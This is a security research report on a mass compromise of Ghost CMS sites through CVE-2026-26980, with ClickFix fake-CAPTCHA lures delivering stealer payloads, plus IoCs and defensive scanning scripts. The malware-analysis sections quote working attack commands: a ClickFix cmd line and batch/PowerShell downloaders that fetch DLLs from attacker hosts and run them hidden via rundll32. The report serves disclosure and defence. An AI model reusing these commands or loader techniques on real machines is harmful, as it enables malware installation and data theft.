Ghost CMS Mass Compromised via CVE-2026-26980, Now Fueling ClickFix Attacks

Background

On May 7, 2026, XLab detected a poisoning incident targeting the Ghost CMS of one of our important clients. The attacker exploited the high-risk SQL injection vulnerability CVE-2026-26980 in Ghost CMS to obtain the target site's Admin API Key without authentication, then used the Ghost Admin API to tamper with articles in bulk, injecting malicious JavaScript loaders at the bottom of the pages in support of FakeCaptcha attacks: forged Cloudflare human-verification pages that lure users into executing malicious commands locally.

After an in-depth investigation and analysis, we determined that this was not a targeted intrusion against the customer, but rather a large-scale poisoning campaign by an in-the-wild attack group targeting Ghost CMS. Although CVE-2026-26980 was publicly disclosed as early as February 19, a large number of users did not patch and upgrade in time, providing an opportunity for attackers. At least two groups are currently actively conducting such poisoning operations, and some sites have even become the target of competition between the two parties, with different malicious code being implanted one after another within a single day.

Ghost CMS Poisoning Incident Timeline

Through proactive detection of page poisoning characteristics, we have cumulatively identified more than 700 domains that have been contaminated, including several globally renowned sites, covering multiple industries such as universities, blockchain, AI / SaaS, security research, media, and fintech.

ghostcmd_victim.png

Undoubtedly, users' natural trust in these Ghost sites will greatly increase the success rate of ClickFix-type attacks. In the first wave of attacks, the Cloaking domain in the attack chain used Cloudflare's proxy service, which left an effective interception window for Cloudflare. It is very likely that users saw abnormal prompt boxes on poisoned sites and reported the relevant websites, ultimately prompting Cloudflare to block the Cloaking domain clo4shara[.]xyz used by the attacker at the time, cutting off the attack chain and to some extent mitigating the impact of this poisoning incident.

However, on May 16, we found that the attacker had updated their Cloaking domain (the new domain being com-apps[.]cc, which had not yet been intercepted by Cloudflare at the time) and upgraded the final payload to a stealer trojan with zero detections on VT.

ghostcmd_cfblock.png

Since May 10, we have been sending security notifications to victims one after another. Although some enterprises have responded and initiated remediation work, the vast majority of notifications have so far received no response at all. We believe that, whether from the current infection situation or future potential risks, such poisoning activities should not be ignored.

  • From the current infection situation, the attacker only needs to move the Cloaking domain out of Cloudflare's service, and the attack chain can resume normal operation, with the infected domains immediately becoming accomplices to ClickFix attacks.
  • From the perspective of future potential risks, the Ghost CMS credentials and configuration style collected this time may be used by attackers for lateral penetration against other business systems of the same infected entity; in addition, other sites that have not yet been infected but use Ghost CMS are also under threat, as attackers are fully capable of using the same methods to launch attacks against them.

On May 17, while conducting a new round of mapping of contaminated sites, we were surprised to find that more and more well-known websites (such as Harvard University, Oxford University, Auburn University, etc.) had been affected, and we also discovered the malicious code of a second attack group. Clearly, in-the-wild poisoning attacks are on the rise, and more and more Ghost sites that have not been upgraded are on the verge of being infected. We have decided to publicly report this incident to the security community, strongly recommending that all users of Ghost CMS immediately complete system upgrades and, based on the characteristic information provided in this article, actively conduct self-inspection and remediation work.

ghostcmd_harvard.jpg

Scope of Impact

Through feature scanning of publicly accessible pages, we have cumulatively identified more than 700 poisoned victim domains, and have proactively contacted the sites for which contact information could be obtained, notifying them of the poisoning. The following are the categorized statistical results of the victim domains derived based on AI-assisted analysis.

| Industry Category | Count | Percentage | Representative Entries |
|---|---|---|---|
| Personal Blog / Independent Site | 368 | 48.1% | aad****ie.com, aba***on.com, abou*****te.me |
| Software Development / SaaS / Tech Blog | 113 | 14.8% | 0x4***.dev, better****.dev, blog.al***.team |
| Other / Unclassified | 97 | 12.7% | 123mi****.com, 200**.com.br, abrahamkr*******o.dev |
| AI / Machine Learning | 35 | 4.6% | aibu***.software, aigra****.com, thin***.ai |
| Web3 / Cryptocurrency | 22 | 2.9% | blog.celes***.org, blog.go***.network, insights.blocko*******.co |
| Education / Academia | 21 | 2.7% | jcr.new.**.**.uk, ehc.au****.edu, blog.euro*******.eu |
| Media / News / Publishing | 19 | 2.5% | cubano******21.com, kangla****.com, hamb***1.de |
| Nonprofit / Religion / Community | 16 | 2.1% | bharat*******.org, stjohns****.org, christiansof*******d.com |
| Art / Design / Photography | 12 | 1.6% | andrew***.art, annika*******.art, billke*****tos.org |
| Security / Cybersecurity | 11 | 1.4% | blog.bug****.co, blog.rev***.ai, nixha***.com |
| Travel / Food / Lifestyle | 10 | 1.3% | bayview******.ca, japanj****.com, delftc***.co.nz |
| Health / Medical / Fitness | 9 | 1.2% | bakerinstitutefor*******n.org, almostth*****ess.com |
| Gaming / Sports / Entertainment | 6 | 0.8% | blog.biosteel*****.com, movies*****.com, 8bitr****.com |
| Finance / Fintech | 6 | 0.8% | blog.tw***.pl, blog.investan*****.com |
| Agriculture / Agritech | 5 | 0.7% | 2754.tar****.ie, agrighg-tool.th*****.de |
| E-commerce / Retail / Marketplace | 5 | 0.7% | blog.cotton******.com, barbie****.com, acqu***.marketing |
| Audio/Video / Podcast / Music | 5 | 0.7% | alth**.fm, amokpo****.com, heroes*****.com |
| Automotive / Modification | 3 | 0.4% | mqb-ret*****.com, 944res***.com |
| Legal | 2 | 0.3% | audio*******er.com, atechbroreads********rt.com |

Incident Timeline

  • 2026-02-16: Compilation timestamp of the installer.dll used in the attack
  • 2026-05-07: XLab detected page poisoning characteristics on Ghost sites and began tracing the source
  • 2026-05-08: The attacker updated update.bat and the download chain
  • 2026-05-10: First round of compromised-site enumeration completed: 156 victim domains confirmed
  • 2026-05-16: Cloaking domain updated, delivering a new installer.dll
  • 2026-05-17: Second round of compromised-site enumeration completed: 700+ victim domains confirmed; a new threat actor identified

Vulnerability Background: CVE-2026-26980

CVE-2026-26980 is a high-risk SQL injection vulnerability in Ghost CMS. Without any authentication, an attacker can directly read the database contents through this vulnerability, including the Admin API Key used to call the Ghost Admin API.

There are two types of keys in Ghost's API system:

  • Content API Key: Read-only by default, used only by the frontend to read published content
  • Admin API Key: Has management permissions over articles, themes, users, etc., and can call interfaces such as PUT /ghost/api/admin/posts/:id/ to directly modify articles

In this incident, what the attackers stole was the Admin API Key, which is also the fundamental prerequisite for their ability to tamper with article content in bulk.

Attack Chain Overview

The entire attack process has obvious five-stage characteristics of "CMS Takeover → Page Poisoning → Two-stage Loading → Social Engineering Lure (FakeCaptcha/ClickFix) → Malware Delivery", and the entire process is highly automated: bulk vulnerability scanning → automatic key extraction → bulk injection → dynamic C2 distribution.

cve_2026_26980.png

Stage 1: Injecting Malicious JavaScript at the End of Articles

After successfully obtaining the target site's Admin API Key, the attacker modifies article content through the Ghost Admin API, inserting malicious code at the bottom of each article. The malicious code we captured comes in two versions with the same core functionality; the new version only refines the loading logic, using the browser's localStorage to ensure the follow-on code runs only once per browser.

Old Version

ghostcmd_loader_old.png

New Version

ghoscmd_loader_new.png

Code behavior analysis:

| Behavior | Description |
|---|---|
| atob("aHR0cHM6Ly9jbG80c2hhcmEueHl6LzExejc3dTMucGhw") | Base64 decodes to https://clo4shara[.]xyz/11z77u3.php |
| d += a.search.substring(1) | Passes the current page's query string to the C2, allowing segmented delivery keyed on utm / refid parameters |
| c.id = btoa(a.origin) | Sets base64(origin) as the id of the injected <script> tag so the C2 server can identify each victim site (a unified fingerprint across poisoned sites) |
| b.appendChild(c) | Dynamically creates and loads the remote script in the victim's browser |

This is a typical two-stage loader: the first stage is a thin loader written statically into the database, while the real payload is returned on demand by clo4shara[.]xyz/11z77u3.php.

The benefits of this design for the attacker are very obvious:

  • Switching payload content (phishing redirect / information stealing / mining / browser 0day / activation only under specific geography or UA) does not require re-invading the site at all
  • Once discovered, the C2 can "go silent first" and then "revive", bypassing signature matching based on payload content
  • The same loader can be reused across multiple compromised sites, with the C2 side identifying the source via the btoa(origin) identifier

Stage 2: Two-stage Cloaking Script, Redirecting to Forged Verification Page

Directly accessing clo4shara[.]xyz/11z77u3.php reveals a piece of code, which is actually a typical traffic distribution script. Its core function is to collect various fingerprint information from the user's browser and upload it to the server, then perform actions such as redirection, popups, and downloads based on the returned instructions. After analysis, we believe that this PHP script was not independently developed by the attackers, but rather originates from the commercial Cloaking service provider Adspect. In malicious scenarios, Cloaking technology enables websites to dynamically switch content based on the visitor's identity: real victims will receive the malicious payload, while security researchers or crawlers will only see a harmless "safe page".

1. Environmental Fingerprint Collection

By collecting fingerprint information from multiple dimensions such as browser, system, and hardware (such as WebGL graphics card model, Navigator properties, time zone, touch event support, whether the console has been tampered with, etc.), a unique identifier of the browser environment is constructed and reported to the server to determine whether the request is from a real victim.

ghostcmd_fingerprint.png

2. Remote Control

Supports 19 different instructions including local, fetch, proxy, 301–307 status codes, iframe, form, php, js, etc., capable of executing arbitrary JavaScript code, allowing the attacker to fully control the victim's browser.

ghostcmd_main.png

In practice, when a real victim accesses 11z77u3.php, the returned window._adata-related code is shown below. Here the script executes the iframe instruction, causing the browser to load the next-stage page cloud-verification[.]com in an iframe.

window._adata = {
  "ok": true,
  "action": "iframe",
  "cid": "69fca6a9ad57095d",
  "js": false,
  "target": "https://cloud-verification[.]com"
};

From the user's perspective, the browser displays a Cloudflare-style "human verification" page asking the user to "Verify you are human".

Forged Cloudflare verification page

Stage 3: ClickFix Social Engineering Attack

The page mentioned in the previous section is a convincing counterfeit of Cloudflare's "human verification" page. When the user clicks "Verify", the page guides the user through the following three steps, supposedly to pass verification. This is the currently very popular Fake CAPTCHA technique, which uses social engineering to lure users into completing the delivery and execution of malware themselves.

  1. Use the WIN+R shortcut to open the command window
  2. Use Ctrl+V to paste the command
  3. Press Enter to execute the command.

FakeCAPTCHA social engineering page

Inexperienced readers might say: "This doesn't look malicious at all?" In fact, the trick lies in setTimeout. It sets a function that will execute with a delay of at least 500 milliseconds after the page is visited, used to secretly download malicious files in the background, with the download address being https://cloud-verification[.]com/update.zip. If the user's browser does not have "download notification" enabled, the entire process will be completed without any awareness.

ghostcmd_clickfix.png

The command that the user pastes via Ctrl+V comes from the dropper script on the page. Decoding it from base64 yields the following, whose function is to launch and execute the downloaded update.zip malicious payload:

cmd /c "move %USERPROFILE%\Downloads\update.zip %TEMP%\u.zip && tar -xf %TEMP%\u.zip -C %TEMP% && start /min "" %TEMP%\update.bat" & REM * I am not a robot reCAPTCHA Verification ID:2771

| Operation | Description |
|---|---|
| move update.zip | Moves the archive from the Downloads directory to a temporary directory |
| tar -xf | Extracts the ZIP archive |
| start /min update.bat | Silently executes the malicious batch file in a minimized window |
| REM * I am not a robot... | Disguised as a reCAPTCHA verification code to lower the user's vigilance |

Stage 4: Payload Delivery

So far, we have captured the following four download addresses, which fall into two categories: update.zip and NotepadPlusPlus.zip. The malicious code in the update.zip category is stored in update.bat.

  • jalwat[.]com/static/uploads/campaigns/6/update.zip
  • cloud-verification[.]com/update.zip
  • com-apps[.]cc/update.zip
  • com-apps[.]cc/NotepadPlusPlus.zip

ghostcmd_updatebat.png

May 7: update.bat from jalwat[.]com

@echo off
powershell -W 1 -C "$f=$env:Temp+'\installer.dll'; iwr 'https://link.storjshare[.]io/raw/jwqiycdezuj5gpqsyqn3damxbhgq/000/supman/installer.dll' -OutFile $f;  Start-Process rundll32 -ArgumentList  $f,'Begin' -Window Hidden"
start "" "https://youtube.com"

May 8: update.bat from cloud-verification[.]com

@echo off
powershell -W 1 -C "$f=$env:Temp+'\installer.dll'; iwr 'https://link.storjshare[.]io/raw/jwl6ukpgv3mronv4ik2atzxsfxzq/sup/installer.dll' -OutFile $f;  Start-Process rundll32 -ArgumentList  $f,'Begin' -Window Hidden"
start "" "https://wl[.]gl/supp.jpg"
exit

May 9: update.bat from com-apps[.]cc

@echo off
powershell -W 1 -C "$f=$env:Temp+'\publl.dll'; iwr 'https://t[.]ly/docreport09052026.pdf' -OutFile $f;  Start-Process rundll32 -ArgumentList  $f,'Begin' -Window Hidden"
start "" "https://bc[.]ax/Supp.html"
exit

Their core logic is the same: download a DLL file (in the first two cases from the Storj public CDN), call its exported function Begin via rundll32 with a hidden window, and then open a decoy page to distract the user.

Decoy image

NotepadPlusPlus.zip differs slightly: on May 16, the archive contained a cmd file; two days later, it became a js file.

ghostcmd_notepad.png

May 16: NotepadPlusPlus.cmd from com-apps[.]cc

@echo off
setlocal
if not "%1"=="am_admin" (powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c %~f0 am_admin' -WindowStyle Minimized" & exit /b)
mode con: cols=1 lines=1
powershell -WindowStyle Hidden -Command ^
"$dll = '%APPDATA%\Microsoft\Windows\NotepadPlusPlus.dll'; ^
Invoke-WebRequest 'https://taketwolabs[.]com/wp-content/NotepadPlusPlus.dll' -OutFile $dll -UseBasicParsing; ^
Start-Process rundll32 -ArgumentList $dll, 'Begin' -WindowStyle Hidden"
exit

May 18: NotepadPlusPlus.js from com-apps[.]cc

ghostcmd_notepadjsfile.png

Both are downloaders: the cmd file retrieves the next-stage payload NotepadPlusPlus.dll, while the js file retrieves the final-stage payload UtilifySetup.exe.

Sample Analysis: installer.dll & notepadplusplus.js

The bat or cmd files mentioned above are all used to download the next-stage DLL file. Although the different scripts save it under names such as publl.dll and NotepadPlusPlus.dll, the PDB information in the samples shows that the DLL's real name is installer.dll. So far we have captured only two installer.dll samples, corresponding to two different stages.

ghostcmd_installerpdb.png

Stage 1: May 7 to May 9

MD5: 5659292833ec421da11ebde005d9c9a8
Compiled Timestamp: 2026-02-16 18:19:13
Language: Rust
PDB: installer.pdb

Behavioral flow:

  1. Creates a randomly named folder under %TEMP%
  2. Downloads the next-stage sample from https://wl[.]gl/sup.exe and saves it
  3. Launches sup.exe using cmd

The final retrieved sup.exe is a PuTTY client carrying a valid code signing certificate, and this link is now invalid. We judge that this stage is very likely just a test / statistical delivery, used to verify the feasibility and conversion rate of the entire poisoning chain. The core basis for this judgment is:

  • The loader itself does not perform any persistence
  • The downloaded payload does not perform any malicious behavior

Stage 2: May 16 to present

MD5: d30cc10d54ebc967c8538ff74f442eee
Compiled Timestamp: 2026-05-16 04:04:55
Language: Rust
PDB: installer.pdb

Its function is the same as the first-stage installer.dll, which is to download and execute the next-stage payload UtilifySetup.exe from the address amazonbusketss-535659318049-us-west-1-an.s3.us-west-1.amazonaws[.]com/UtilifySetup.exe.

ghostcmd_dlurl.png

As discussed earlier, NotepadPlusPlus.zip comes in two forms, cmd and js. We know that NotepadPlusPlus.cmd is used to download installer.dll, so what is the purpose of NotepadPlusPlus.js?

MD5: ec5dfee13abf94e08d0f94e90b527db0
Language: JavaScript

After deobfuscating NotepadPlusPlus.js, it is not difficult to see that its function is likewise to download and execute the next-stage payload UtilifySetup.exe.

ghostcmd_notepadjs.png

Sample Analysis: UtilifySetup.exe

UtilifySetup.exe is an installation file packaged with Inno Setup. After execution, it will be extracted to the %appdata%\local\SuperMaxionQuickMaxlite directory.

MD5: 18a7251ddde77ed24bc54700d84d9be1
SHA1: 9434fe686801742ef7d6da248fb0b900dc32208a
Compiled TimeStamp: 2026-02-11 19:40:27
Type: Inno Setup

fake_grape.png

This is actually an Electron program. After unpacking the asar, you can see that the source code comes from the open-source Grape application on GitHub.

ghostcmd_asar.png

This file has 0 detections on VT — could it be another test program? The answer is no. After analysis, we found that the attacker replaced the original entry file with a malicious index.js.

ghostcmd_index.png

After deobfuscation, it is not difficult to see that it uses the setLoginItemSettings API built into the Electron framework to achieve persistence; every 30 seconds it sends a POST request to the remote server web-telegram[.]ug and polls for instructions, which can execute arbitrary JS code or run executable files.

ghostcmd_indexfunc.png

Another Attack Group

During our investigation, we found that some victims were attacked a second time. Taking bitsy.ai as an example, it was on the first victim list on May 10 but not on the second batch list on May 17. We were initially pleased by bitsy.ai's remediation, but upon inspection we found that although the previous scripts had been cleaned up, another type of malicious script had been implanted. This script uses simple string reversal as obfuscation; the restored next-stage JavaScript address is https://staticcloudflare[.]pro/api/css.js.

ghostcmd_newjs1.png

Taking the Harvard International Review as another example, on April 23 there was a public analysis report about it being hacked for ClickFix attacks, with the IOC involved being script-dev[.]digital. The article did not provide the malicious script, but through tracing we found the following script, whose restored next-stage JavaScript script address is https://script-dev[.]digital/api/css.js.

ghostcmd_newjs3.png

The two domains staticcloudflare[.]pro and script-dev[.]digital use the same /api/css.js URI pattern, and both have resolved to 144.31.236.66, so we assess that they belong to the same attack group.

ghostcmd_actor2.png

And by May 16, we found that the Harvard International Review had been implanted with the malicious script from this campaign. After Base64 decoding the string aHR0cHM6Ly9jb20tYXBwcy5jYy8xMXo3N3UzLnBocA==, it is precisely the new Cloaking script address https://com-apps[.]cc/11z77u3.php.

ghostcmd_harvard_actor1.png

Most interestingly, just 1 day later, another attack group cleared the above code and implanted the same malicious script as bitsy.ai. We can't help but lament that Harvard International Review, a rather serious site, was so wantonly toyed with by two attack groups.

ghostcmd_harvard_actor2.png

The Ctrl+V command on this attack group's ClickFix page is shown below. Its core part is $d, a hexadecimal string XOR-encrypted with the key h2QHiVI.

ghostcmd_newclickcode.png

The decrypted code is shown below. Its function is to download and execute the next-stage payload. The address is Base64-encoded as aHR0cHM6Ly9jZG51cGRhdGVuZXdzLnRvcC9kbD9maWQ9Mzg=, which decodes to https://cdnupdatenews[.]top/dl?fid=38. Unfortunately, we did not capture this payload and cannot further analyze the ultimate intent of this attacker.

ghostcmd_decclickcode.png

This article does not conduct an in-depth analysis of this attacker for the time being, only providing some threat intelligence. Tracing through the specific URI /api/css.js, nearly 500 suspicious domains can be found on VT, some of which are linked to Aeternum.

ghostcmd_uri.png

Self-Inspection and Detection Methods

Site Side (Ghost Operations)

  1. Check article content: Whether it contains any of the following fingerprints
    • The string sj.ssc/ipa/ or ghost_once_footer_
    • The strings atob( and appendChild appearing together in the article body
    • The string btoa(a.origin)
  2. Check Ghost backend logs: Whether there are abnormal PUT /ghost/api/admin/posts/:id/ requests, especially those from unfamiliar IPs, abnormal UAs, or bulk modifications in a short period of time
  3. Check Code Injection configuration items and theme files: Whether additional <script> tags have been implanted
  4. Check the API Key list: Whether there are unknown or long-unused Admin API Keys
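As an added example (not XLab's tooling or Ghost's own code), the following Python script turns checklist items 1 and 3 above, and the database-level cleanup in the remediation section, into a scan over a posts table: it looks for the fingerprints named above (ghost_once_footer_, btoa(a.origin), sj.ssc/ipa/, and atob( together with appendChild) in each post's rendered HTML, and removes only the <script> blocks that carry one. The in-memory SQLite table, its column names (id, slug, html) and the sample post bodies are constructed for the demo; real Ghost also keeps the editor source in a separate column (mobiledoc or lexical), which should receive the same check so the injected block is not regenerated from it.

```python
import re
import sqlite3

# Fingerprints named in the self-inspection checklist. The first two belong to the
# loader of threat actor A, the third is actor B's reversed "/api/css.js" string.
FINGERPRINTS = ("ghost_once_footer_", "btoa(a.origin)", "sj.ssc/ipa/")
# The checklist also flags atob( and appendChild appearing together in one post body.
CO_OCCUR = ("atob(", "appendChild")
SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)


def find_fingerprints(html: str) -> list[str]:
    """Return the checklist fingerprints present in one post's rendered HTML."""
    hits = [fp for fp in FINGERPRINTS if fp in html]
    if all(token in html for token in CO_OCCUR):
        hits.append("atob(+appendChild")
    return hits


def strip_injected_scripts(html: str) -> tuple[str, int]:
    """Drop only the <script> blocks that carry a fingerprint; keep all other markup."""
    removed = 0

    def _drop(match: re.Match) -> str:
        nonlocal removed
        if find_fingerprints(match.group(0)):
            removed += 1
            return ""
        return match.group(0)

    return SCRIPT_RE.sub(_drop, html), removed


def scan_posts(conn: sqlite3.Connection) -> list[tuple[str, str, list[str]]]:
    """List (id, slug, fingerprints) for every post whose html column is contaminated."""
    flagged = []
    for post_id, slug, html in conn.execute("SELECT id, slug, html FROM posts"):
        hits = find_fingerprints(html or "")
        if hits:
            flagged.append((post_id, slug, hits))
    return flagged


def clean_posts(conn: sqlite3.Connection) -> int:
    """Remove fingerprinted <script> blocks from every post; return how many were removed."""
    total = 0
    rows = conn.execute("SELECT id, html FROM posts").fetchall()
    for post_id, html in rows:
        cleaned, n = strip_injected_scripts(html or "")
        if n:
            conn.execute("UPDATE posts SET html = ? WHERE id = ?", (cleaned, post_id))
            total += n
    conn.commit()
    return total


def build_demo_db() -> sqlite3.Connection:
    """Constructed stand-in for Ghost's posts table (assumed columns id, slug, html)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id TEXT PRIMARY KEY, slug TEXT, html TEXT)")
    # Placeholder bodies: the fingerprint strings are the real ones from the report,
    # the surrounding code is not the attackers' loader.
    posts = [
        ("p1", "clean-post",
         '<p>Hello</p><script>console.log("site analytics")</script>'),
        ("p2", "actor-a-style",
         '<p>Post body</p><script>console.log("site analytics")</script>'
         '<script>/* ghost_once_footer_ */ var c = document.createElement("script");'
         'c.id = btoa(a.origin); c.src = atob("PLACEHOLDER"); b.appendChild(c);</script>'),
        ("p3", "actor-b-style",
         '<p>Post body</p><script>var u = "sj.ssc/ipa/"; /* reversed string */</script>'),
    ]
    conn.executemany("INSERT INTO posts VALUES (?, ?, ?)", posts)
    conn.commit()
    return conn


if __name__ == "__main__":
    db = build_demo_db()
    for post_id, slug, hits in scan_posts(db):
        print(f"{post_id} ({slug}): {', '.join(hits)}")
    print("removed", clean_posts(db), "script blocks; remaining hits:", scan_posts(db))
```

Run scan_posts first and review the flagged posts before calling clean_posts, and take a database backup before the UPDATE; the benign analytics script in post p2 survives the cleanup because only fingerprinted blocks are dropped.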

User Side / Browsing Side

  • Whether you have been led to fake verification pages such as cloud-verification[.]com or com-apps[.]cc

  • Whether your download history contains jalwat[.]com, taketwolabs[.]com, com-apps[.]cc, or cloud-verification[.]com

Remediation Recommendations

We strongly recommend that Ghost CMS users perform the following remediation operations. If you are interested in our research or need help, you can contact us via X platform.

  1. Urgently upgrade Ghost CMS to the official version that has fixed CVE-2026-26980
  2. Rotate all credentials: Admin API Key, Content API Key, administrator password, Session
  3. Clean up implanted content: At the database level (not just the backend editor), bulk-remove <script> code segments in articles that match the above fingerprints
  4. Audit access logs: Retain at least 30 days of Admin API call logs, and use IoCs for retrospective investigation
  5. Notify users: Recommend that all users who may have visited the site during the contamination period perform local security checks
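As an added example (not XLab's tooling or Ghost's own code) for checklist item 2 above and remediation step 4, the Python script below reads reverse-proxy access logs, keeps only PUT/POST requests to the Admin API posts endpoint named in the report (PUT /ghost/api/admin/posts/:id/), and flags source IPs that edit many posts within a short window or use a non-browser User-Agent. The nginx "combined" log format, the 60-second / 5-edit thresholds and the sample lines (RFC 5737 documentation addresses, invented post ids) are assumptions for the demo.

```python
import re
from collections import defaultdict
from datetime import datetime

# nginx "combined" log format, assumed to sit in front of Ghost; adjust LOG_RE
# if your reverse proxy logs differently.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
# The endpoint the report names for article tampering: PUT /ghost/api/admin/posts/:id/
ADMIN_POST_EDIT_RE = re.compile(r"^/ghost/api/admin/posts/[^/?]+/?(\?.*)?$")

# Constructed sample lines: a scripted burst from one address, one normal editor session,
# and a Content API read that must be ignored.
SAMPLE_LOG = """\
203.0.113.10 - - [07/May/2026:02:11:03 +0000] "PUT /ghost/api/admin/posts/66a1/ HTTP/1.1" 200 5120 "-" "python-requests/2.31.0"
203.0.113.10 - - [07/May/2026:02:11:04 +0000] "PUT /ghost/api/admin/posts/66a2/ HTTP/1.1" 200 4980 "-" "python-requests/2.31.0"
203.0.113.10 - - [07/May/2026:02:11:04 +0000] "PUT /ghost/api/admin/posts/66a3/ HTTP/1.1" 200 5330 "-" "python-requests/2.31.0"
203.0.113.10 - - [07/May/2026:02:11:05 +0000] "PUT /ghost/api/admin/posts/66a4/ HTTP/1.1" 200 6102 "-" "python-requests/2.31.0"
203.0.113.10 - - [07/May/2026:02:11:06 +0000] "PUT /ghost/api/admin/posts/66a5/ HTTP/1.1" 200 4411 "-" "python-requests/2.31.0"
203.0.113.10 - - [07/May/2026:02:11:08 +0000] "PUT /ghost/api/admin/posts/66a6/ HTTP/1.1" 200 5005 "-" "python-requests/2.31.0"
198.51.100.7 - - [07/May/2026:09:30:15 +0000] "PUT /ghost/api/admin/posts/66b0/ HTTP/1.1" 200 6001 "https://blog.example/ghost/" "Mozilla/5.0 (X11; Linux x86_64) Firefox/125.0"
198.51.100.7 - - [07/May/2026:09:31:02 +0000] "GET /ghost/api/admin/posts/66b0/ HTTP/1.1" 200 6001 "https://blog.example/ghost/" "Mozilla/5.0 (X11; Linux x86_64) Firefox/125.0"
192.0.2.44 - - [07/May/2026:10:02:40 +0000] "GET /ghost/api/content/posts/?key=abc HTTP/1.1" 200 19877 "-" "Mozilla/5.0 (Windows NT 10.0) Chrome/124.0"
"""


def parse_line(line: str):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec


def post_edits(lines):
    """Parsed records that modify a post through the Admin API (PUT or POST)."""
    edits = []
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] in ("PUT", "POST") and ADMIN_POST_EDIT_RE.match(rec["path"]):
            edits.append(rec)
    return edits


def peak_edits_in_window(times, window_s):
    """Largest number of edits falling inside any window of window_s seconds."""
    times = sorted(times)
    peak = start = 0
    for end, t in enumerate(times):
        while (t - times[start]).total_seconds() > window_s:
            start += 1
        peak = max(peak, end - start + 1)
    return peak


def find_suspicious_editors(lines, window_s=60, threshold=5):
    """Flag IPs that edit >= threshold posts within window_s seconds or use a non-browser UA."""
    by_ip = defaultdict(list)
    for rec in post_edits(lines):
        by_ip[rec["ip"]].append(rec)
    findings = []
    for ip, recs in by_ip.items():
        peak = peak_edits_in_window([r["ts"] for r in recs], window_s)
        non_browser = sorted({r["ua"] for r in recs if not r["ua"].startswith("Mozilla/")})
        if peak >= threshold or non_browser:
            findings.append({"ip": ip, "edits": len(recs), "peak_in_window": peak,
                             "non_browser_ua": non_browser})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_editors(SAMPLE_LOG.splitlines()):
        print(finding)
```

The non-browser User-Agent signal is a review cue, not proof: legitimate Admin API integrations also edit posts from scripts, so compare flagged IPs against the integrations you actually run, and the time each flagged burst occurred against the contamination window you established from the post content scan.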

IoC

Threat Actor A

clo4shara[.]xyz
cloud-verification[.]com
jalwat[.]com
com-apps[.]cc
web-telegram[.]ug

https://clo4shara[.]xyz/11z77u3.php
https://com-apps[.]cc/11z77u3.php
https://platecrumbs[.]com/11z77u3.php
https://cloud-verification[.]com/update.zip
https://com-apps[.]cc/update.zip
https://com-apps[.]cc/NotepadPlusPlus.zip
https://jalwat[.]com/static/uploads/campaigns/6/update.zip
https://taketwolabs[.]com/wp-content/NotepadPlusPlus.dll

Threat Actor B

staticcloudflare[.]pro
script-dev[.]buzz
updatesecurity[.]pro
updatefilescf[.]top
static-file[.]digital
download-file[.]today
updatefile-cf[.]dgital
script-dev[.]digital
updatefile-cf[.]top
script-dev[.]xyz

https://staticcloudflare[.]pro/api/css.js
https://script-dev[.]digital/api/css.js
https://cdnupdatenews[.]top/dl?fid=38

Sample MD5

5659292833ec421da11ebde005d9c9a8 installer.dll
d30cc10d54ebc967c8538ff74f442eee *NotepadPlusPlus.dll
18a7251ddde77ed24bc54700d84d9be1 *UtilifySetup.exe
f280e12f51f996dae7fffc64a56ee527 *SuperAppizeSetup.msi
fceca579efcef09eb507c6ca977ea281 *css.js

Injected code characteristics

Threat Actor A: "ghost_once_footer_"

Threat Actor B: "sj.ssc/ipa/"